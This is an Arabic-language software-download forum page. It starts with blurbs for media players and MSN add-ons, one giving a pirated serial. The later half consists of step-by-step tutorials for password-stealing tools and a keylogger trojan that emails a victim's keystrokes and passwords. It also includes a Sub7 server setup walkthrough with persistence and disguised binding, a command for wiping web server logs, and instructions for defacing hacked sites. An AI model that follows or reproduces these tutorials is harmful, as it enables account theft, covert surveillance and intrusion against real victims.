وظيفة البرنامج برنامج تحويل الملفات AVI إلى AVI MPEG1 MPEG2 DVD VCD SVCD pictures وكذلك تحويل Pictures AVI MPEG إلى MPEG وتحويل Picture إلى AVI-MPEG ويمكنك التحويل بين أنظمه التشغيل PAL<=> NTSC Divx <==> cinpeak ويمكنك ايضاً إضافة الصور الخاصة بك إلى الفلم الذي تريد
هل فكرت بسماع جميع محطات الراديوا العالميه وتسجيل والنسخ هنا الحل :::nnاقدم لكم اليوم البرنامج الجديد والرائع والمميز هديه لكم nالبرنامج حائز على شهادات تقدير واخر نسخه nيناسب جميع اصدارات وندوز 2003 XP 2000 98 ME 95 nتاريخ الاصدار 28-4-2004 n
برنامج صغير يقوم بتشغيل الموسيقى يتميز بصغر حجمه ويتواجد في صينية النظام حيث تستطيع الوصول إلى أزرار السيطرة مثل التشغيل والإيقاف يتضمن البرنامج ايضاً مؤثرات من نوع visualizations يدعم البرنامج اكثر الصيغ الصوتية شعبية وكذلك الأقراص المدمجة الصوتية والفيديو البرنامج رائع لمن هم يريدون الإستماع للملفات الصوتية بينما هم يعملون على الجهاز .
برنامج يعمل على دمج الصور مع بعض واضافة النصوص والاصوات والتأثيرات عليها بوجود مجموعة من الفلاتر الممتازة..وتستطيع التحكم في ملفات الفيديو بقص المقاطع غير المرغوبة او لصق مقاطع اخرى..
هذا البرنامج إمكاناته عالية يقوم استعراض الصور .. والمشاهد المرئية يدعم أكثر من 25 نوع ما بين صور وفيديو JPEG-JPG GIF BMP ICO WMF AVI MPEG WindowsMedia RealMedia QuickTime ويعمل على جميع انظمة الويندوز حتى الـ xp كما تستطيع التقاط الصور من مشاهد الفيديو عبر هذا البرنامجnلتسجيل البرنامج :nSerial: 112-410-0
هذا البرنامج عبارة عن أداة متطورة للبحث عن أغاني في ملفات MP3 كما يشمل البرنامج على دردشة للاتصال مع أشخاص تشاركك مواضيع مشتركة كما تستطيع ترك رسائل لهم .
هذا البرنامج عبارة عن اداة متطورة للبحث عن اغنيات في ملفات MP3 كما يشمل البرنامج على دردشة للاتصال مع اشخاص تشاركك مواضيع مشتركة كما تستطيع ترك رسائل لهم .
هو برنامج سريع جداً، وقوي، وسهل الاستخدام، لعرض الملفات الصوتية والرسومية والمرئية (الفيديو)، الموجودة في Windows، وهو برنامج بسيط، وفعال، ويستعرض أنواع مختلفة من ملفات الوسائط في صناديق الحوار القياسية في نظام Windows
هو برنامج سريع جداً، وقوي، وسهل الاستخدام، لعرض الملفات الصوتية والرسومية والمرئية (الفيديو)، الموجودة في Windows، وهو برنامج بسيط، وفعال، ويستعرض أنواع مختلفة من ملفات الوسائط في صناديق الحوار القياسية في نظام Windows
برنامج أكثر من رائع لتشغيل ملفات الفيديو فهو يشغل الانساق التالية (mpeg asf rm divx mov(QuickTime) avi dat(Video-CD باختصار يقدر يشغل ملفات الفيديو كلها بدل ما تضيع وقتك تدور اي برنامج يشغل اي ملف
برنامج أكثر من رائع لتشغيل ملفات الفيديو فهو يشغل الانساق التالية (mpeg asf rm divx mov(QuickTime) avi dat(Video-CD باختصار يقدر يشغل ملفات الفيديو كلها بدل ما تضيع وقتك تدور اي برنامج يشغل اي ملف
برنامج تستطيع من خلاله دمج عددة ملفات avi or mpeg وتحويلها الى VCD-DVD-SVCD .تقدر تستخرج الصوت من ملفات الفيديو وحفظها على الصيغ wav and ogg .كذلك استخراج الصور من ملفات الفيديو وحفظها على الصيغ jpgbmptgapngtifpcx والعديد العديد
برنامج تستطيع من خلاله دمج عددة ملفات avi or mpeg وتحويلها الى VCD-DVD-SVCD .تقدر تستخرج الصوت من ملفات الفيديو وحفظها على الصيغ wav and ogg .كذلك استخراج الصور من ملفات الفيديو وحفظها على الصيغ jpgbmptgapngtifpcx والعديد
برنامج من اقوى برامج الاتصال فى العالم كل ما عليك ان تاخذ البرنامج وتحملة على الجهاز وتعمل لنفسك sign up البرنامج شكلة على هيئة تليفون محمول مثل 6600 بعد ما تنزل البرنامج وتشغلة لازم لما تطلب تدخل الرقم2 وبعدين رقم الموبيل ولو تليفون عادى
الوصف: نسخه جديده صدرت لها البرنامج المساعد والإضافي للـMSN ماسنجر ... متوافقة مع الماسنجر MSN وهذي بعض المميزات اللي يضيفها للماسنجر
1) اهم ميزة انه عربي ويدعم لغات كثيرة منها اللغة الإنجليزية طبعاً.
2) تختار رقم سري لبرنامج الماسنجر علشان ما احد يفتحه الا انت.
3) ازالة الدعايات.
4) تقدر اذا كتبت كلام لواحد معك على الماسنجر وودك تعيد نفس الكلام انك تضغط على زر اختصار وترسل نفس الكلام لواحد ثاني.
5) اذا كنت بالخارج تقدر تحط رساله تطلع لأي واحد يكلمك وهذي قديمه لكن الجديد انك تقدر تغير لون الرساله.
6) اذا طلع اي واحد عندك بالماسنجر اون لاين يطلع صوت موحد ... لكن مع بلس تقدر تحط صوت مختلف لكل واحد عندك بالقائمة.
7) تقدر تخلي الماسنجر يشيك على ايميلاتك الثانيه بحد اقصى اربع ايميلات (POP mails).
8) واحلى ميزة شفتها هي انك تقدر تعرف كل واحد عندك بالقائمة متى آخر مره تكلمت معه ... يعني اللي ما قد كلموك من شهرين وثلاثه تحذفهم وانت مرتاح.
9) في امكانيه ان الماسنجر يصير شفاف.
10) منبه للمواعيد.
11) اذا كنت تستخدم الماسنجر بالعمل فالبس يبي يفيدك في اخفاء الماسنجر.
12) تقدر تعرف من اللي سوى خروج او من اللي غير اسمه. 13) تشفير سجل المحادثة.
14) زيادة الحد الاقصى للرسالة الى ثلاث اضعاف اي حوالي 1100 حرف
15) بالماسنجر العادي تقدر تحط الحاله بالخارج او مشغول او غيرها من الحالات المحددة ... لكن مع بلس تقدر تكتب الحالة اللي تبي وعلى كيفك ... مثلاً تحط نايم او بالخارج للصلاة او غيرها
الوصف: نسخة تجريبية من الماسنجر السابع وهذه النسخة صدرت بشكل رسمي من شركة مايكروسوفت... لمزيد من التفاصيل حول الماسنجر السابع اضغط على صفحة البرنامج ... والشكر موصول للأخ سليمان الذي وفر رابط هذه النسخة.
الوصف: ريل بلاير غني عن التعريف فهو من اشهر مشغلات الملتيميديا ... فعن طريقه تقدر تشغل مجموعه كبيره من الملفات الصوتية والمرئية ... وهو متوافق مع كل اصدارات الوندوز
الوصف: مافيه داعي انك تتصل على شيوخ يفسرون لك احلامك !! هذا ان عطوك وجه .. لان الخط مشغول 24 ساعه .. الحين حمل هالبرنامج العربي وفسر احلامك بنفسك .. وتمنياتنا لك بأحلام سعيدة
نظراً لكثرة الطلب على هذا البرنامج .. فقد تم إعادة رفعة الى السيرفر لمدة محدودة.
الوصف: برنامج صغير لكنه اكثر من رائع ... اذا جيت تكلم احد بالماسنجر وشفته حاط صورة ... تقدر تآخذ الصورة وتحفظها عندك ... واذا كلمك احد على الماسنجر وحط ابتسامة مهيب عندك علشان يقهرك ... شغل هالبرنامج والقط الإبتسامة ونزلها بالمحادثة واقهره )
function a121020032() {window.open('http://www.vip600.com/sss/pic/ss/eqla3softMSN2.GIF','meter','width=393 height=264')}
الوصف: برنامج الداونلود اكسلريتور وهو من اروع البرامج لتسريع تنزيل الملفات من الإنترنت ... فهو يزيد السرعة بنسبة 300% يقوم بتسريع الدون لود على كل انواع الاتصال (Dial-up, Cable, DSL / ADSL, T1 etc.)
الوصف: يشتكي الكثير من مستخدمي الاكس بي بانواعه بعدم قدرتهم على دخول الشات أو بعض المواقع لان ذلك يتطلب تحميل هذا الملف JAVA VM. وهو من ضمن البرامج التي حصل بسبها رفع قضية الاحتكار على مايكروسوفت
الوصف: برنامج البالتوك غني عن التعريف (أشهر برنامج محادثه على الأنترنت) خاصة بعد انهيار برنامج (firetalk)واندماجه معه وهو من اقوى البرنامج للتحدث بالصوت والصورة
الوصف: ماسنجر خطييييييييييييييييييير ... ويدعم اللغة العربية ... وكل ما عليك هو انك تروح لـView وتحط صح عند ادفانس كونتاكت ليست وبعدها لا تنسى تغير الخط وتحط خط يدعم العربي مثل Tahoma ..... من مميزاته تعرف اذا كان الشخص اللي يكلمك قفل نافذة المحادثة والا لا - تقدر تدخل الماسنجر بأكثر من ايميل يعني تشغل ماسنجرين ثلاثة اللي تبي - تقدر تدخل بشكل مخفي ولا احد يدري انك اون لاين - تقدر تعرف اذا احد مسوي لك بلوك والا لا - اسمك تقدر تخليه يتحرك - تقدر تعرف اذا احد حذفك من قائمته والا لا - تقدر تخلي اسمك اي شئ حتى الكلمات اللي ما كانت تقبل بالماسنجر العادي هذا يقبلها - فيه ابتسامات اكثر من الماسنجر العادي .... هاه يكفي والا ازيد ؟؟؟؟ بصراحة فيه مميزات خطيره ويستحق التجربه ... متوافق مع Windows 95, 98, ME, NT, 2000, XP
الوصف: ملف مضغوط يحتوي على مصحف كامل بالرسم العثماني مع الخطوط العثمانية ... بعد فك ضفط الملف سيظهر لديك ملفين ... احدهما ملف وورد وحجمه تقريباً 27 ميغا وهو يحتوي على القرآن الكريم ... اما الملف الثاني فهو للخطوط العثمانية والتي يجب ان تركبها اولاً حتى يظهر القرآن بشكل صحيح ولمعرفة طريقة تركيب الخطوط يرجىالضغط هنا
وأرجو من الله أن تعجبكم هذه المكتبة الرائعة وبإذن الله سوف نضع المزيد والمزيد
هذا البرنامج يستخدم فى سرقة الباسورد و هو بالعربى عند تحميلة وفك الضغط سوف يكون هناك ثلاث ايكونات 1-good 2-pic 3-photo1
الملفان الثانى و الثالث هما البتش لاتفتحم اما الاول هو البرنامج الفتحة طبعا اضغط على ايقونة اختار الباتش وحدد مكانة بالكمبيوتر بتاعك اى واحد منهم اما فى الايكونة الاخرى اكتب بريدك انتة علشان توصلك الباسورد اضغط على حفظ الباتش ثم ok وارسل الباتش الى اختارتة وابعتة للضحية هذا هو الشرح السريع لانة برنامج سهل و مش محتاج شرح حمل البرنامج من المرفق.
salam ce jours lla g la derniere version de bazooka pour hacker un compte msn je souhaitte qu'il vous plait vous pouver telecharger le programme de ce lien : http://www.me3ady.com/up/up/hackrz_tazabazoka0.2.zip [IMG]3awdelil[/IMG]
برنامج سرقة باسوردات الياهو و الهوتميل و aol في ان واحد و في برنامج واحد اسمة Bazooka طريق التشغيل : اولا: افتح البرنامج و اكتب في اول فراغ ايميل الضحية بدون ياهو او هوتميل او aol ثانياُ : اختار من جهه اليمين عنوان امل الضحية اي ياهو او هوتميل او aol ثالثاً : اكتب في الفراغ التالي ايميلك كاملاً علشان يأتي لك الباسورد اضغط create و ادخل على الملف راح تلقى ملف بعنوان الضحية ارسلة عن طريق html عند فتحة سوف يكتب الباسورد و راساً ياتي لك و شكراً البرنامج في المرفقات
البرنامج ده متخصص فى سرقة وارسال كلمات السر والباسوردات المتخزنة فى الكاش ريجسترى الخاص بالويندوز وده برنامج قوى جدااااااااااااااا لانه بيتمتع بوظائف فى غاية القوة وهو برنامج روسى لكن ممكن استخدامه بالانجليزية وزى ما قلت بيسرق كل كلمات المرور داخل الشبكة المحلية والفيزا كارد والبريد الالكترونى وكل الباسوردات ----------------------------------------------------------- شرح البرنامج
--------------------------------------
1 / تهيئة برنامج الاعداد علشان يشتغل باللغة الانجليزية
ممكن تستخدموا الاعداد القياسى اعتمادا على اول باتش configure using templates مع ملاحظة وضع علامة صح فى المربع الاخير علشان البرنامج يشتغل باللغة الانجليزية
--------------------------------------- هنا حتحدد عنوان الايميل الا عايز من البرنامج يرسلك الملفات المسروقة عليه
--------------------------------------- هنا حتحدد مزود البريد الا عايز من البرنامج يستخدمه وممكن تستخدم احد الاعدادات الا فى البرنامج
تحديد عدد مرات الارسال :وافضل ترك القيمة صفر زى ما هى علشان يقوم البرنامج بارسال تقاريره فى كل مره يدخل فيها الضحية الانترنت
--------------------------------------- ده بيسمح لك تكتب عناوين الملفات الا انت عايزها مع ملاحظة انك بش فى حاجة الى كتابة موقع اى ملف داخل الويندز بس اكتب عناوين الملفات الا انت عايزها واضغظ add علشان تضمه للقائمة والا بعده وهكذا
-------------------------------------- ده يعتبر من اقوى المميزات الا موجوده فى البرنامج علشان بيسمحلك انك تحدد برامج بعينها زى الورد والباد والتكست واضافتها للقائمة وبكده حتحصل على كل نسخة كاملة من كل حرف بيكتبه الضحية فى البرامج على شكل ملف تكست يرسل اليك
---------------------------------------
الخيار ده بيسمح لك ان تحدد رسالة خطا يتم عرضها على الضحية لو حصل وحاول معرفة الملف الا فيه الباتش. وانت عندك حرية كتابة الرسالة وممكن تجربها علشان تشوف شكلها عن طريق test
--------------------------------------- هنا حتحدد اسم للملف ويراعى عدم تحديد مسار لان الملف ده حيتحط تلقائيا فى مجلد الويندز وانصح باستخدام الاعداد الا فى البرنامج
--------------------------------------- الخاصيه ده بتحدد شكل التقارير الاحيبعتها التروجن لك علشان بعض مزودات البريد ما بتدعمش استقبال رسائل HTML ولسه بتستقبل رسائل بنمط TEXT
عموما اختار الا يريحك
امكانية دمج الباتش مع ملف علشان تغرى الضحية والمثير ان اللعبة او البرنامج حيشتغل بصورة طبيعية جداااااااااا مع ملاحظة ان ممكن الضحية يعطى نسخة منه لاى حد فما تستغربش لما تلقى تقارير اضافية فى البريد عندك ودلوقتى حنحفظ كل الخطوات الا احنا عملنها فى ملف على جهازك علشان تبعته للضحية ولك حرية تسمية الملف ومكن تخزينه لكن اوعى تضغط عليه علشان لا تتلقى تقارير عن جهازك
هنا حيتم عرض الاعدادات الا انت قمت بيها والخصائص الا انت ضفتها مع Save
اخيرا مبروك عليك البرنامج وكل الا انت قمت بيه وكده كل شىء انتهى فى شرح البرنامج هنـ التحميل ـااااااااا
يلا يا ادمن ثبت بسرعة الموضوه هذا بيستحق التثبيت بس على فكرة البرنامج ده مشروح بس على قراصنة فلسطين بلصور
سوف ينقسم الدرس الي إحدى عشرة نقطة :- 1- مقدمة عن الهكرز. 2- أقسام هكرز الأجهزة. 3- برنامج الهكرز. 4- المنفذ (Port). 5- الأي بي (IP). 6- البرامج الاكثر أستخداما . 7- بعض برامج الهكرز وشروحاتها 8- ميكانيكية الاختراق . 9- معرفة أذا كان جهازك قد تم أختراقه 10- ملاحظات ومعلومات عامة 11- النهاية والآن نبدأ الشرح 1- مقدمة عن الهكرز:- الهكرز هم أشخاص أصلا مبرمجين محترفين طوراا قدراتهم وأصبحوا يستطيعون التسلل الي الأجهزة والمواقع وغيرهاا وأسمهم بالعربي مخترقون أو متسللون أما الانجليزي وهو الشائع الكتابة بنطقه بالعربي هو (Hackers) ##################################################
##2- أقسام الهكرز:- الهكرز ينقسمون الي ثلاث أقسام (طبعاا هكرز الاجهزة) أ- المبتدىء : وهو أخطر أنواع المخترقين لأنه يريد تجربة كل ما تعلمه وغالبا ما يحب التدمير وتخريب الاجهزة ب- الخبير: وهذا لاخوف منه لأنه يخترق الاجهزة فقط للبحث فيهاا و أخذ ما يعجبه منها ج- المحترف: وهو يجمع الأثنين معاا فأولا يأخذ الأشياء التي يريدها من جهاز الضحية وبعدهاا يقوم بتدميره ##################################################
3- برنامج الهكرز:- كل برنامج هكرز ينقسم الى ثلاث أقسام وهي أ- ملف البرنامج الرئيسي وهو الذي من خلاله سوف تقوم بأختراق جهاز الضحية ب- ملف التجسس (Server) وهو الملف الذي يقوم بأكبرجزء في الأختراق ولا أنصحك بفتحه ج- أعدادات ملف التجسس أو ((Edit Server)) ومن خلاله تقوم بصنع ملف التجسس والذي سوف ترسله الي الضحية ##################################################
# 4- المنفذ (Port):- وأتوقع أنه مفهوم من من نفس الكلمة فهو منفذ يصل بينك وبين الضحية عن طريقه يتم أختراق الضحية ونقل الملفات من الى أمثلة على المنافذ:- 8080 25 26 12 6588 80 وغيرها ##################################################
## 5- الأي بي (IP) وهو أهم شيء في أختراق الاجهزة ولا يتم الأختراق ألا به وتستطيع معرفة الأي بي الخاص بك من أ- أبدأ ب-تشغيل ج- أكتب الامر winipcfg ستفتح نافذة أمام الكلمة "عنوان IP " ستجد أرقام مكتوبة مكونة من أربع أجزاء هي الأي بي الخاص بك كل جزأ يدل على شيء فالجزء الاول يدل على مكان الأقامة والجزء الثاني أو الثالث يدل على مزود خدمة الانترنت ويجب أن تكون على الانترنت حتى يظهر الاي بي الخاص بك أما أذا لم تكن على الانترنت فسوف يظهر لك أصفار. ##################################################
##
- البرامج الالكثر أستخداما:- ينتشر في العام العربي عدة برامج هكرز ومن أكثرهاا أنتشارا السب سفن (Sub7) لسهولة أستخدامه وكثرة الميزات التي به من المرحة والمرعبة ومبرمجه هو الهكر الكبير كيفن ميتنك لكن ذالك لا يعني أنه الاقوى . ويوجد بعض البرامج الاخرى مثل الهاك أتاك والنت بص والديب ثرو ولكن أستخدامهم قليل. أما عن أقوى برنامج هكرز فهو الباك أوورفايس ولكن لا يستخدمه ألا الخبراء المحترفين لصعوبة أستخدامه وتعقيده ولكنه أقوى البرامج مع شهادة أكبر الهكر ##################################################
شرح أعدادات السيرفر (Edit Server) 1-بعد تحميل البرنامج وفك ضغطه سوف تجد ثلاث أجزاء البرنامج الاساسي السيرفر وإديت سيرفر كما ذكرت 2- إضغط على Edit server 3- ثم إضغط على run in normal mode 1- أمام كلمة port اكتب البورت 27444 2- أمام كلمة password ضع الرقم السري الي تبيه وأمام كلمة re –enter password كرر نفس الباسورد الي كتبته 3-أمام كلمة protect password اكتب الي رقم وينفع يكون نفس الباسورد الاول وتحته كرر الباسورد نفسه علشان ما أحد يخترق الضحية من خلال السيرفر الا أنت 4- ضع علامة صح أمام الجملة melt serverafter installatoin 4- انتقل الى الخيار startup methods ضع علامة صح أمام العبارتين win .ini و system.ini 5- إنتقل الى الخيار notifications وإضغط على add e-mail notify وأكتب ايميلك علشان أول مايدخل الضحية الى النترنت تأتيك رسالة على اليميل تخبرك بأن الضحيه دخل النترنت ومعاها الاي بي والبورت واضغط على الخيار binded files وإضغط على الكلمة add executed file وأرفق السيرفر مع أي ملف تريد انتقل الى الخيار e-mail وضع صح أمام الجملة e-mail all passwords to وأكتب أسم اليميلك علشان تجيك رسالة الى اليميلك تخبرك أن الضحية دخل النترنت انتقل الي الخيار exe icon / other وضع علامة صح أمام الجملة change server icon وإختار الشكل الي تبي لأيقونة سيرفرك وأخيرا إضغط على كلمة save as… وضع السيرفر في أي موقع في جهازك وبعدين أرسله على الضحية وبعد أن يفتحه سوف ترسل لك رسالة على الايميل الذي وضعته في السيرفر وفيها الاي بي والبورت تبعات الضحية وبكذا تكون قد أنتهيت من آخر شيء لازم لعملية الاختراق ##################################################
####### 8- ميكانيكية الأختراق:- بعد صنع السيرفر تقوم بأرساله للضحية إما عن طريق الايميل وأما عن طريق الماسنجر وغيرها ويجب على الضحية فتحه وبعد فتحه ترسل لك الأي بي والبورت على الايميل ومن ثم تأخذهم وتضعهم بالبرنامج وتسوي كونكت وتمتع بالاختراق ##################################################
10- معرفة أذا كان جهازك قد تم أختراقه أم لا :- طبعا ليس قد تم أختراقه ولكن يتم أختراقه وطبعاا تعرف ذالك وأنت على الانترنت ببعض الخطوات وهي:- أ- أبدأ ب- تشغيل ج- أكتب الامر System.ini سوف تفتح معك مفكرة أنظر الي السطر الخامس أذا كان بجانبه ***** نجوم فأذاا أنت مخترق والطريقة مش دائما لأنها تكون حسب أعدادات السيرفر فممكن يحطها تدخل في السستم الطريقة الثانية:- طبعاا بعد الدخول في الانترنت سوف ينزل لك في الزاوية بجانب الساعة كمبيوترين أخضرين قم بفتحهم أذا رأيت أن البايت المرسلة أكثر من البايت المتلقاه فأذا أنت مخترق ##################################################
ملاحظات و معلومات عامة. أ- أنصحكم بعد تعلم الهكر عن طريق برنامج السب سفن أن تغير عنه بأي برنامج آخر لأنه من السهولة التغير في شيفرته البرمجية ولذالك من الصعب أن تبحث على نسخة أصلية أما النسخ المغير شفرتها البرمجية فأن بعض الهكر يغيرونها ويجعلوها بمجرد فتح البرنامج يرسل على أيميله جميع باسووردات جهازك وثبت ذالك عندما أنتشر بالانترنت السب سفن المزور ولكي تتحقق قم بفتحه وأنت على الانترنت وشغل شاشة الدوس وأكتب الامر netstat -n وسوف تضهر لك 3 أيبيات مختلفة أيبيين منهم على أيميل الياهو والآخر غير معروف ب- أذا كنت تتحدث عن طريق ال MSN ماسينجر وأردت أختراق الذي تتحدث معه قم بأرسال له السيرفر الذي صنعته وأذا بدأ بأستقباله ((قبل أن ينتهي من أستقباله)) قم بفتح شاشة الدوس من أبدأ ثم برامج ثم موجه MS-DOS وأكتب الأمر التالي netstat -n سوف يكون آخر أي بي هو آيبي المتحدث معه على الماسنجر أي الضحية وأيضا الايبيات الاخرى هي الايبيات المتصلة معك على الانترنت وقد يكون منها أي بي مخترقك ج- أنصحكم بعد تعلم أختراق الأجهزة أن تتحولو الى أختراق المواقع لأنها سوف تفيدكوم كثيرا د- " أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد " و- يفضل تطبيق الشرح على جهازك أولا لتتعرف على الطريقة أفضل وكي تفهمها أحسن وترى الذي يحدثه الهكر ك- أي تغير في أمتداد السيرفر يؤدي الى أبطال مفعوله ل- لملف التجسس أسماء كثيرة منها السيرفر- الباتش - أحصنة الطوروادة - التورجوان. ن- السيرفر يكون أمتداده .exe
اول شيئ عليك ان تعلم: 1- لاتحسبنا المجد تمرا انت اكلهو.... لن تبلغ المجد حتى تلعق الجمرا. (يعني مو بليلة وضحاها رح تصير هكر محترف) 2- ان الهكر الحقيقي لا يستعمل برامج صنعها هكر اخر بل الذي يبتكر اشياء جديدة. وذلك لان الانجاز الذى يقوم به الهاكر الاخر تنسب لصاحب البرنامج
1- (اساسيات وتعاريف) تلنت: (Telnet) - 1 و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي للدخول الى الموقع بطريقة خفية لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات. لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت. ------------------------------------------------------------------------ برامج السكان: (Scanner) - 2 و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة Shadow Security Scanner و Stealth و Omran Fast هذه البرامج، برنامج Scanner و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS على ثغرات السي جي اي فقط و منها برامج المسح CGI ----------------------------------------------------------------------- اكسبلويت: (Exploits) - 3 هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits CGI Bugs Unicodes Exploits Buffer Over Flow Exploits PHP Exploits DOS Exploits والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول Fire Wall .وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون امتدادها (.c) هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا. ---------------------------------------------------------------------- الجدار الناري: (FireWall) - 4 هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة. ---------------------------------------------------------------------- هو ملف الباسورد المظلل: (Token) - 5 (Shadowed Passwd) والذي يكون فيه الباسورد على شكل * او x البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب Shadow file تجده في /etc/shadow ---------------------------------------------------------------------- Anonymouse) - 6 هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها في الدخول المجهول الى السيرفر و سحب الملفات منه. ---------------------------------------------------------------------- Valnerableties) - 7 أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره . ما هي مفردها ؟ Valnerable أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع Security Focus أو بوق تراك او غيرها. ---------------------------------------------------------------------- : ملف الباسوورد(passwd file) - 8 هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا. ---------------------------------------------------------------------- الجذر: (root) - 9 و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات. غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها . ---------------------------------------------------------------------- السيرفر: (Server) - 10 هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون) ----------------------------------------------------------------------- بوفر أوفر فلو: ( Buffer over Flow ) - 11 وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر . ----------------------------------------------------------------------- كثير من الهكرز يحبون ان يطلقوا على كل من ال - 12 pc , servers , supercomputers كلمه BOX ----------------------------------------------------------------------- 13- النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز تسطيع ان تطلق على الرئيس هناك كلمه superuser وهو يكون روت وهو الادمين او المدير على النظام.... ----------------------------------------------------------------------- 14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليونيكس. ----------------------------------------------------------------------- 15- احنا اخترقنا موقع لازم نمسح خطواتنا علشان لايعرفنا صاحب الموقع ويئذينا كيف؟ /c+del+c:/winnt/system32/logfiles/*.log نكتب هذا الامر بالدوس او نروح السي وبعدين فايل ويندوز بعدين فايل system32 بعدين امسح ملف اسمة * -------------------------------------------------------------------الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟ تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا index افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه cute FtP WS_FTP PRO والبرنامج سهل اللي يبي شرح يقولي
------------------------------------------------------------------------------------------------ 17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها ) هذي من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وتلقى: ============================================
************* 8- voideye http://content.443.ch/pub/security/...ner/VoidEye.zip نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على sss **************************************************
